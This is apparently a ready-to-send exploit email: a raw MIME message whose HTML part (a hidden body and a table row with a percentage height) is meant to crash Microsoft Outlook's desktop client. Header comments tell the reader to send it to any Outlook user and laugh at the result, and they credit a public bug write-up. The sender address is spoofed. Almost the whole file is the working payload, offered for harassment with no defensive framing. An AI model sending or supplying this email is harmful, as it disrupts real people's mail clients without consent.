#### Send this email from your nix box to any user using any version of outlook's hard client and laugh all through the night #### 
#### Not my code, Credit goes to: Haifei sauce: https://justhaifei1.blogspot.ca/2017/03/an-interesting-outlook-bug.html #### 

Content-Type: multipart/alternative; boundary="===============111111111111==
MIME-Version: 1.0
Subject: title
From: CrashNBurn@msft.com
To: <target@crashNburn.com>

--===============111111111111==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit

HAHAHAHAHAAAAAA CRASH!!! N BURN!!!!!
--===============111111111111==
Content-Type: text/html; charset="us-ascii"
MIME-Version: 1.0

<html>
<head>
<style>body{display:none !important;}</style>
</head>
<body>    
<div>
e
</div>
<div>
 <table>
  <tr height="1%">
  </tr>
 </table>
</div>
<div>
e
</div>
</body>
</html>

--===============111111111111==--
